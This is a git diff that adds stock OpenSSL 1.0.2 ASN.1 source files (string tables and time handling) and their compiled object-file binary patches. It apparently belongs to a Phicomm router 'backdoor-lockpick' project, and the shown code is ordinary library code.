+        return 0;
+    ASN1_STRING_set_default_mask(mask);
+    return 1;
+}
+
+/*
+ * The following function generates an ASN1_STRING based on limits in a
+ * table. Frequently the types and length of an ASN1_STRING are restricted by
+ * a corresponding OID. For example certificates and certificate requests.
+ */
+
+ASN1_STRING *ASN1_STRING_set_by_NID(ASN1_STRING **out,
+                                    const unsigned char *in, int inlen,
+                                    int inform, int nid)
+{
+    ASN1_STRING_TABLE *tbl;
+    ASN1_STRING *str = NULL;
+    unsigned long mask;
+    int ret;
+    if (!out)
+        out = &str;
+    tbl = ASN1_STRING_TABLE_get(nid);
+    if (tbl) {
+        mask = tbl->mask;
+        if (!(tbl->flags & STABLE_NO_MASK))
+            mask &= global_mask;
+        ret = ASN1_mbstring_ncopy(out, in, inlen, inform, mask,
+                                  tbl->minsize, tbl->maxsize);
+    } else
+        ret =
+            ASN1_mbstring_copy(out, in, inlen, inform,
+                               DIRSTRING_TYPE & global_mask);
+    if (ret <= 0)
+        return NULL;
+    return *out;
+}
+
+/*
+ * Now the tables and helper functions for the string table:
+ */
+
+/* size limits: this stuff is taken straight from RFC3280 */
+
+#define ub_name                         32768
+#define ub_common_name                  64
+#define ub_locality_name                128
+#define ub_state_name                   128
+#define ub_organization_name            64
+#define ub_organization_unit_name       64
+#define ub_title                        64
+#define ub_email_address                128
+#define ub_serial_number                64
+
+/* This table must be kept in NID order */
+
+static const ASN1_STRING_TABLE tbl_standard[] = {
+    {NID_commonName, 1, ub_common_name, DIRSTRING_TYPE, 0},
+    {NID_countryName, 2, 2, B_ASN1_PRINTABLESTRING, STABLE_NO_MASK},
+    {NID_localityName, 1, ub_locality_name, DIRSTRING_TYPE, 0},
+    {NID_stateOrProvinceName, 1, ub_state_name, DIRSTRING_TYPE, 0},
+    {NID_organizationName, 1, ub_organization_name, DIRSTRING_TYPE, 0},
+    {NID_organizationalUnitName, 1, ub_organization_unit_name, DIRSTRING_TYPE,
+     0},
+    {NID_pkcs9_emailAddress, 1, ub_email_address, B_ASN1_IA5STRING,
+     STABLE_NO_MASK},
+    {NID_pkcs9_unstructuredName, 1, -1, PKCS9STRING_TYPE, 0},
+    {NID_pkcs9_challengePassword, 1, -1, PKCS9STRING_TYPE, 0},
+    {NID_pkcs9_unstructuredAddress, 1, -1, DIRSTRING_TYPE, 0},
+    {NID_givenName, 1, ub_name, DIRSTRING_TYPE, 0},
+    {NID_surname, 1, ub_name, DIRSTRING_TYPE, 0},
+    {NID_initials, 1, ub_name, DIRSTRING_TYPE, 0},
+    {NID_serialNumber, 1, ub_serial_number, B_ASN1_PRINTABLESTRING,
+     STABLE_NO_MASK},
+    {NID_friendlyName, -1, -1, B_ASN1_BMPSTRING, STABLE_NO_MASK},
+    {NID_name, 1, ub_name, DIRSTRING_TYPE, 0},
+    {NID_dnQualifier, -1, -1, B_ASN1_PRINTABLESTRING, STABLE_NO_MASK},
+    {NID_domainComponent, 1, -1, B_ASN1_IA5STRING, STABLE_NO_MASK},
+    {NID_ms_csp_name, -1, -1, B_ASN1_BMPSTRING, STABLE_NO_MASK}
+};
+
+static int sk_table_cmp(const ASN1_STRING_TABLE *const *a,
+                        const ASN1_STRING_TABLE *const *b)
+{
+    return (*a)->nid - (*b)->nid;
+}
+
+DECLARE_OBJ_BSEARCH_CMP_FN(ASN1_STRING_TABLE, ASN1_STRING_TABLE, table);
+
+static int table_cmp(const ASN1_STRING_TABLE *a, const ASN1_STRING_TABLE *b)
+{
+    return a->nid - b->nid;
+}
+
+IMPLEMENT_OBJ_BSEARCH_CMP_FN(ASN1_STRING_TABLE, ASN1_STRING_TABLE, table);
+
+ASN1_STRING_TABLE *ASN1_STRING_TABLE_get(int nid)
+{
+    int idx;
+    ASN1_STRING_TABLE *ttmp;
+    ASN1_STRING_TABLE fnd;
+    fnd.nid = nid;
+    ttmp = OBJ_bsearch_table(&fnd, tbl_standard,
+                             sizeof(tbl_standard) /
+                             sizeof(ASN1_STRING_TABLE));
+    if (ttmp)
+        return ttmp;
+    if (!stable)
+        return NULL;
+    idx = sk_ASN1_STRING_TABLE_find(stable, &fnd);
+    if (idx < 0)
+        return NULL;
+    return sk_ASN1_STRING_TABLE_value(stable, idx);
+}
+
+int ASN1_STRING_TABLE_add(int nid,
+                          long minsize, long maxsize, unsigned long mask,
+                          unsigned long flags)
+{
+    ASN1_STRING_TABLE *tmp;
+    char new_nid = 0;
+    flags &= ~STABLE_FLAGS_MALLOC;
+    if (!stable)
+        stable = sk_ASN1_STRING_TABLE_new(sk_table_cmp);
+    if (!stable) {
+        ASN1err(ASN1_F_ASN1_STRING_TABLE_ADD, ERR_R_MALLOC_FAILURE);
+        return 0;
+    }
+    if (!(tmp = ASN1_STRING_TABLE_get(nid))) {
+        tmp = OPENSSL_malloc(sizeof(ASN1_STRING_TABLE));
+        if (!tmp) {
+            ASN1err(ASN1_F_ASN1_STRING_TABLE_ADD, ERR_R_MALLOC_FAILURE);
+            return 0;
+        }
+        tmp->flags = flags | STABLE_FLAGS_MALLOC;
+        tmp->nid = nid;
+        new_nid = 1;
+    } else
+        tmp->flags = (tmp->flags & STABLE_FLAGS_MALLOC) | flags;
+    if (minsize != -1)
+        tmp->minsize = minsize;
+    if (maxsize != -1)
+        tmp->maxsize = maxsize;
+    tmp->mask = mask;
+    if (new_nid)
+        sk_ASN1_STRING_TABLE_push(stable, tmp);
+    return 1;
+}
+
+void ASN1_STRING_TABLE_cleanup(void)
+{
+    STACK_OF(ASN1_STRING_TABLE) *tmp;
+    tmp = stable;
+    if (!tmp)
+        return;
+    stable = NULL;
+    sk_ASN1_STRING_TABLE_pop_free(tmp, st_free);
+}
+
+static void st_free(ASN1_STRING_TABLE *tbl)
+{
+    if (tbl->flags & STABLE_FLAGS_MALLOC)
+        OPENSSL_free(tbl);
+}
+
+
+IMPLEMENT_STACK_OF(ASN1_STRING_TABLE)
+
+#ifdef STRING_TABLE_TEST
+
+main()
+{
+    ASN1_STRING_TABLE *tmp;
+    int i, last_nid = -1;
+
+    for (tmp = tbl_standard, i = 0;
+         i < sizeof(tbl_standard) / sizeof(ASN1_STRING_TABLE); i++, tmp++) {
+        if (tmp->nid < last_nid) {
+            last_nid = 0;
+            break;
+        }
+        last_nid = tmp->nid;
+    }
+
+    if (last_nid != 0) {
+        printf("Table order OK\n");
+        exit(0);
+    }
+
+    for (tmp = tbl_standard, i = 0;
+         i < sizeof(tbl_standard) / sizeof(ASN1_STRING_TABLE); i++, tmp++)
+        printf("Index %d, NID %d, Name=%s\n", i, tmp->nid,
+               OBJ_nid2ln(tmp->nid));
+
+}
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_strnid.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_strnid.o
new file mode 100644
index 0000000000000000000000000000000000000000..b9ca0881e972f8e3ab9952bbde078d7d97a62f6b
GIT binary patch
literal 6112
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_time.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_time.c
new file mode 100644
index 0000000..fcb2d56
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_time.c
@@ -0,0 +1,228 @@
+/* crypto/asn1/a_time.c */
+/* ====================================================================
+ * Copyright (c) 1999 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/*-
+ * This is an implementation of the ASN1 Time structure which is:
+ *    Time ::= CHOICE {
+ *      utcTime        UTCTime,
+ *      generalTime    GeneralizedTime }
+ * written by Steve Henson.
+ */
+
+#include <stdio.h>
+#include <time.h>
+#include "cryptlib.h"
+#include "o_time.h"
+#include <openssl/asn1t.h>
+#include "asn1_locl.h"
+
+IMPLEMENT_ASN1_MSTRING(ASN1_TIME, B_ASN1_TIME)
+
+IMPLEMENT_ASN1_FUNCTIONS(ASN1_TIME)
+
+#if 0
+int i2d_ASN1_TIME(ASN1_TIME *a, unsigned char **pp)
+{
+# ifdef CHARSET_EBCDIC
+    /* KLUDGE! We convert to ascii before writing DER */
+    char tmp[24];
+    ASN1_STRING tmpstr;
+
+    if (a->type == V_ASN1_UTCTIME || a->type == V_ASN1_GENERALIZEDTIME) {
+        int len;
+
+        tmpstr = *(ASN1_STRING *)a;
+        len = tmpstr.length;
+        ebcdic2ascii(tmp, tmpstr.data,
+                     (len >= sizeof tmp) ? sizeof tmp : len);
+        tmpstr.data = tmp;
+        a = (ASN1_GENERALIZEDTIME *)&tmpstr;
+    }
+# endif
+    if (a->type == V_ASN1_UTCTIME || a->type == V_ASN1_GENERALIZEDTIME)
+        return (i2d_ASN1_bytes((ASN1_STRING *)a, pp,
+                               a->type, V_ASN1_UNIVERSAL));
+    ASN1err(ASN1_F_I2D_ASN1_TIME, ASN1_R_EXPECTING_A_TIME);
+    return -1;
+}
+#endif
+
+ASN1_TIME *ASN1_TIME_set(ASN1_TIME *s, time_t t)
+{
+    return ASN1_TIME_adj(s, t, 0, 0);
+}
+
+ASN1_TIME *ASN1_TIME_adj(ASN1_TIME *s, time_t t,
+                         int offset_day, long offset_sec)
+{
+    struct tm *ts;
+    struct tm data;
+
+    ts = OPENSSL_gmtime(&t, &data);
+    if (ts == NULL) {
+        ASN1err(ASN1_F_ASN1_TIME_ADJ, ASN1_R_ERROR_GETTING_TIME);
+        return NULL;
+    }
+    if (offset_day || offset_sec) {
+        if (!OPENSSL_gmtime_adj(ts, offset_day, offset_sec))
+            return NULL;
+    }
+    if ((ts->tm_year >= 50) && (ts->tm_year < 150))
+        return ASN1_UTCTIME_adj(s, t, offset_day, offset_sec);
+    return ASN1_GENERALIZEDTIME_adj(s, t, offset_day, offset_sec);
+}
+
+int ASN1_TIME_check(ASN1_TIME *t)
+{
+    if (t->type == V_ASN1_GENERALIZEDTIME)
+        return ASN1_GENERALIZEDTIME_check(t);
+    else if (t->type == V_ASN1_UTCTIME)
+        return ASN1_UTCTIME_check(t);
+    return 0;
+}
+
+/* Convert an ASN1_TIME structure to GeneralizedTime */
+ASN1_GENERALIZEDTIME *ASN1_TIME_to_generalizedtime(ASN1_TIME *t,
+                                                   ASN1_GENERALIZEDTIME **out)
+{
+    ASN1_GENERALIZEDTIME *ret;
+    char *str;
+    int newlen;
+
+    if (!ASN1_TIME_check(t))
+        return NULL;
+
+    if (!out || !*out) {
+        if (!(ret = ASN1_GENERALIZEDTIME_new()))
+            return NULL;
+        if (out)
+            *out = ret;
+    } else
+        ret = *out;
+
+    /* If already GeneralizedTime just copy across */
+    if (t->type == V_ASN1_GENERALIZEDTIME) {
+        if (!ASN1_STRING_set(ret, t->data, t->length))
+            return NULL;
+        return ret;
+    }
+
+    /* grow the string */
+    if (!ASN1_STRING_set(ret, NULL, t->length + 2))
+        return NULL;
+    /* ASN1_STRING_set() allocated 'len + 1' bytes. */
+    newlen = t->length + 2 + 1;
+    str = (char *)ret->data;
+    /* Work out the century and prepend */
+    if (t->data[0] >= '5')
+        BUF_strlcpy(str, "19", newlen);
+    else
+        BUF_strlcpy(str, "20", newlen);
+
+    BUF_strlcat(str, (char *)t->data, newlen);
+
+    return ret;
+}
+
+int ASN1_TIME_set_string(ASN1_TIME *s, const char *str)
+{
+    ASN1_TIME t;
+
+    t.length = strlen(str);
+    t.data = (unsigned char *)str;
+    t.flags = 0;
+
+    t.type = V_ASN1_UTCTIME;
+
+    if (!ASN1_TIME_check(&t)) {
+        t.type = V_ASN1_GENERALIZEDTIME;
+        if (!ASN1_TIME_check(&t))
+            return 0;
+    }
+
+    if (s && !ASN1_STRING_copy((ASN1_STRING *)s, (ASN1_STRING *)&t))
+        return 0;
+
+    return 1;
+}
+
+static int asn1_time_to_tm(struct tm *tm, const ASN1_TIME *t)
+{
+    if (t == NULL) {
+        time_t now_t;
+        time(&now_t);
+        if (OPENSSL_gmtime(&now_t, tm))
+            return 1;
+        return 0;
+    }
+
+    if (t->type == V_ASN1_UTCTIME)
+        return asn1_utctime_to_tm(tm, t);
+    else if (t->type == V_ASN1_GENERALIZEDTIME)
+        return asn1_generalizedtime_to_tm(tm, t);
+
+    return 0;
+}
+
+int ASN1_TIME_diff(int *pday, int *psec,
+                   const ASN1_TIME *from, const ASN1_TIME *to)
+{
+    struct tm tm_from, tm_to;
+    if (!asn1_time_to_tm(&tm_from, from))
+        return 0;
+    if (!asn1_time_to_tm(&tm_to, to))
+        return 0;
+    return OPENSSL_gmtime_diff(pday, psec, &tm_from, &tm_to);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_time.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_time.o
new file mode 100644
index 0000000000000000000000000000000000000000..91ed55b69437d44b39cc47884b4c067c043034d4
GIT binary patch
literal 5600
zcmb_fZ){uD6~D1v;&$0<3N5u()Vjl6U7(g<+G%YyHowF#enu}TOPmrx;o;h^jcMX!
z&a;{Vf=F(nzB!>t+fWfmNU#r^G++}5ReS(zR2r2iLWn=A_)?V$(tj|@MzaF*&bjYi
z`})O}_F+eQ@0|0y=bU@bx&PjKT-AF$ZEb{88~FvPYaAuy?5esPqhgG7l9fbB4QclG
zTIq5itCfA5!qBAI@sMAxXfxjwHzw`#y8ZbAI%xJ6HF2i0^7oaMuT?IsEAR1@uCFb&
zQ<F;_a;0=VP+aCXl=YB5t8MF`Q7s0RP6qB*_P+J?%JtW^`5$873;1&MH7@;5m;TcR
zUD=bg-&KYb`@>om!<ub{{M!7Z__9Ks4M}Nog$^ufpVVe5#dWG&kx#w;BE)>-47}dN
z(Kvae)R`;A&3#aTA1mc}Xth>`sHKIj(qiV&X5IcOZeP^wFCE)Wx_vcXuMGr#N0rZC
zTGeQVeL^G+>fuzmUXNkjJ_{vL?pGe5Wsy(G?_ap3TCHMD$_Za-5h_ZHR9aliB)LLO
zm7%2lFGzk+v%mcn9nMU}`gz~X6>E84*(7~4=ZiNBDO(${$(OWMQhLM}DBo0Eqm?K9
zd|F}XLpb!iOMmmo-_%j-V%eK4k77yb1jOe@yjr=(-<P>Ey<@v>Up&;#T6j^MsI?m1
z3mM)=Q*=h1(n_bQblut4VCjV$W+@<7VAWlH3Ho;?^Y8IcC(b)?-&)|B{kC@PJ+1n-
z?F;doH=MvluR(TObo(<tjM_3?4Z+Yo07lHEcv>r`La^$$t#+-?Fkhd_J<1-e@M$HL
zwEwBuA30m)<aEP$r{szbOAV@cZQ-Tws#U0>Pp(|rq{AYN>9{be3r|tpTF~u(!)g&m
zh+~*qI)=;BY(Xf-Tk=lQ6(!1GzigzEeJW%i(lV}8xX_$q<_(nS>Dd(w5A7@FtzvLz
zWLqS<RsLC#s`6u9(MWXr76*2`e86xPu)jqA5b+RFLCgye(rSm1wuc8u+f--Ux{h}L
zlQ1VCz;9t~Q^>oe&N+`F1!lboDe8Gh3Mf)%x8%pzab`zn8)W3eO|a1>*t84V0s8M4
z_A&Basq+bsDh1}fsuY~_DN=ZLSwfm_^SmmB<5I9&3c$!<AYh99zK1?Q^n?PA*m(qi
z);o-B2foPU*N{UW^Vr9nSCN9V*hgtu9I||db^%E{U0_Y3?2!H=^P5AzS?^s^%yW#_
zBnEB6%<ebL?wAKg`h>Sz3eNjfDLe-`L}zbENPlVbWTYtc2rXhR=+=xdtdD$EZPw;(
zdV}Cx^Vx3n@<JpxtpLCy#G!M~jJ$Lexjiuc4NE~lykvO`9D7+xUh;z_;EyO$+by;B
z4GeFVnU~;dXe69FTnlbG2?cG2?*hYSc(Mh)w*`Kv1%4Fp8==m;zPzue0AD546ZZqs
z3-E9o3b5B-fnywuhs15(6lB`KUZ;Vh{c)yq`%ggUGHap??=Q5c>s_!}6l7}1UhPm%
zv_HXgx`#nt)1uC|w!pWyz!NR-2LZ=^j{!&G`#;a{XBp1VfX6^@mhaOo@ISLSud_Jx
z+<<;gwXi?e0>9b<|4$2i1svFz*934RJ`Wo}Z#MoYvk$P1LC+uX`(+Dzk~XZ|m>J2C
z^kiP9vSE!I))<NCJyCqg#7OA7yA|Eo-P=2;ri_%*t*ZvveYe^_IH(&3#xQ{6UbHf(
zun08b0W)tF(xbVD&8*O57?V~ybI{0)95nW)bE72Nl{4yhWlb`2mUD&XEOX2NBa-XN
zx(#U?;PuPa$eV`*znX>@v9Z5knnGh;rLF1gLqr`IFeZwYVHOJG1;=zK)l+M3%-lc^
zI^cxbuMQ}B@?JGwv#n<`X|hykTV}+}9Bl3;H1S>qh<d{ex$4?HR4wtr)IhR7Vc;0L
zhkBv-h0)B!;kuj_#|Bntk;@-&qB7^qIC#|a$>#R&cP#>gVsxGUgud~vBJj6D2z*FU
zk_8;sFURp*MM8W0<>B}}2m&E~BRm}E-x7%5B;b#OjD*_-|4O+1F$96!_;U`t1b?{&
z{tt#@zvB2;!Tv=;9M2fu@0|jUcNWL{1Ux9<SpnZD;ExKpnD09Reyd>rseo@5a6c9R
z2*(+QhmU7{3mnfABxHCybNjmlyhFeTgg9FSJT2h233x@oHwpL|0l!1QzZUS2fOoL-
z4)YT0^N4^)1p6liT(my|Hb@xfW_WnM{F@Z<fPnu2WF*A#TZP-diXaf;_#MshKMC^^
z67W|9T&zPBY>==Szq0t3RuE()EC(wI)iwIA<5Nt>?-L|$f7DUQ1mhe(&h#TLoZmaV
zo!g&ab|1Lx`8~Yg!udV?oeSspD&G4@JU+ko_PTI>zmdq~;V~<{54cru_z0H@=4d)%
znNt>tWYbofMD|Til1O136*QM4GN@=o5s;uUGCH0~kCI4cd~D3jgKK`=G9&Qow3Xgi
zOh1q>MkWg56K26W%wm`$aI>W0Cj7rp5Tfuo7X!wa@;qC=yp5HIt7IKWxb|W-#1YQo
zW(CriKYk~nuOC66fWru$--x@qA?Mrxvv>E8dlqB5&Hq<_yeBYb7d#?ye>{6d;{9{3
zLL<uV{%KJF-yu4K9CYb1(3{mS%sS?E!usK!bk}bfFzlc2Ul1wnz@R|4JFNER<K{dK
zEnKb{fskSTB8IZt_Sb;5!-M-sq!H#H6hV;r_&IEYfHB?vN16X|SBGx@BjAgsF?d9Z
zvHJO$Kh_WL74FaL+N^Jk6J!S<&qD$XAGiN<z?RHCU`N@n=b$SwS32|?q?x~lA16S+
Kby)4~_Wv(%Mer{G

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_type.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_type.c
new file mode 100644
index 0000000..4a36aff
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_type.c
@@ -0,0 +1,154 @@
+/* crypto/asn1/a_type.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
